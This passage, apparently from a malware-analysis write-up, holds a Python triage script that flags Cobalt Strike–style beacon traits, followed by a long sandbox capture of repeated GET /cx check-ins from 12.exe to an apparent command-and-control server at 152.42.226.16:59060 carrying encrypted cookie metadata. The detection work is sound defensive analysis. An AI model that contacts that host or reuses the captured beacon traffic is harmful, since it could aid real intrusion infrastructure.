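    "GET /cx HTTP/1.1\r\n"
    "Accept: */*\r\n"
    f"Cookie: {COOKIE}\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n"
    "Host: 152.42.226.16:59060\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
TIMESTAMPS = [
    "Dec 26, 2024 19:27:58.501960039 CET",
    "Dec 26, 2024 19:28:01.404603958 CET",
    "Dec 26, 2024 19:28:04.326299906 CET",
    "Dec 26, 2024 19:28:07.245825052 CET",
    "Dec 26, 2024 19:28:10.171814919 CET",
    "Dec 26, 2024 19:28:13.248894930 CET",
    "Dec 26, 2024 19:28:16.155977964 CET",
    "Dec 26, 2024 19:28:19.110304117 CET",
]
EXPECTED_HTTP_PORTS = {80, 8080}  # assumption: where plain HTTP is unremarkable
RSA1024_BLOCK = 128               # bytes in one RSA-1024 ciphertext block
MAX_JITTER_CV = 0.1               # assumption: stdev/mean below this counts as periodic


def parse_request(raw: str):
    """Return (method, uri, headers) from a raw HTTP/1.1 request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def parse_ts(ts: str) -> datetime:
    """Parse a Joe Sandbox timestamp, dropping the nanosecond digits beyond microseconds.
    The zone suffix is ignored: only differences between timestamps are used."""
    m = re.fullmatch(r"(.+?\.\d{6})\d{3} [A-Z]+", ts)
    if not m:
        raise ValueError(f"unexpected timestamp format: {ts!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def host_port(headers: dict, default: int = 80) -> int:
    host = headers.get("host", "")
    return int(host.rsplit(":", 1)[1]) if ":" in host else default


def decode_cookie(cookie: str) -> bytes:
    """Decode a Cookie value that is one bare base64 string; b'' if it is not base64."""
    try:
        return base64.b64decode(cookie)
    except ValueError:
        return b""


def check_in_intervals(timestamps) -> list:
    ts = sorted(parse_ts(t) for t in timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def triage(raw: str, timestamps) -> dict:
    """Measure one repeated request and list the reasons it looks like a beacon."""
    method, uri, h = parse_request(raw)
    port = host_port(h)
    blob = decode_cookie(h.get("cookie", ""))
    intervals = check_in_intervals(timestamps)
    avg = mean(intervals) if intervals else 0.0
    cv = pstdev(intervals) / avg if len(intervals) >= 3 and avg else None
    flags = []
    if port not in EXPECTED_HTTP_PORTS:
        flags.append(f"plain HTTP to non-standard port {port}")
    if len(blob) == RSA1024_BLOCK:
        flags.append("Cookie is one 128-byte base64 blob (size of an RSA-1024 ciphertext, "
                     "the form Cobalt Strike's default profile uses for beacon metadata)")
    if cv is not None and cv < MAX_JITTER_CV:
        flags.append(f"{len(intervals)} check-ins every {avg:.2f}s (CV {cv:.3f}) to {method} {uri}")
    ua = h.get("user-agent", "")
    if "MSIE 7.0" in ua and "Windows NT 5.1" in ua:
        flags.append("User-Agent claims IE 7 on Windows XP, implausible for a current host")
    return {"port": port, "cookie_bytes": len(blob), "mean_interval": avg, "cv": cv, "flags": flags}


if __name__ == "__main__":
    for reason in triage(REQUEST, TIMESTAMPS)["flags"]:
        print("-", reason)
```

Run as-is it prints four reasons: the non-standard port 59060, the 128-byte Cookie blob, eight check-ins about 2.94 s apart with a coefficient of variation under 0.02, and the IE 7 on Windows XP user agent. The cookie-size check is specific to the default Cobalt Strike HTTP GET profile, which carries the RSA-encrypted session metadata base64-encoded in the Cookie header; a malleable C2 profile can move that blob into another header or parameter and transform it, so the periodicity and port checks are the ones that survive profile changes.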


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49731 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:01.404603958 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 49732 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:04.326299906 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 49733 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:07.245825052 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.4 | 49734 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:10.171814919 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.4 | 49735 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:13.248894930 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.4 | 49737 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:16.155977964 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.4 | 49741 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:19.110304117 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.4 | 49743 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:22.092303991 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.4 | 49745 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:25.001307964 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.4 | 49746 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:27.889086008 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.4 | 49747 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:30.810631990 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.4 | 49748 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:33.727039099 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.4 | 49749 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:36.613922119 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.4 | 49750 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:39.532476902 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.4 | 49751 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:42.453362942 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.4 | 49752 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:45.440135956 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.4 | 49753 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:48.397075891 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.4 | 49754 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:51.315757036 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.4 | 49755 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:54.218161106 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.4 | 49758 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:28:57.203973055 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.4 | 49764 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:00.131360054 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          22         | 192.168.2.4 | 49770       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:03.033688068 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          23         | 192.168.2.4 | 49776       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:05.984513998 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          24         | 192.168.2.4 | 49782       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:08.875693083 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          25         | 192.168.2.4 | 49788       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:11.766458035 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          26         | 192.168.2.4 | 49794       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:14.654863119 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          27         | 192.168.2.4 | 49805       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:17.548139095 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          28         | 192.168.2.4 | 49811       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:20.445466042 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          29         | 192.168.2.4 | 49817       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:23.509773970 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
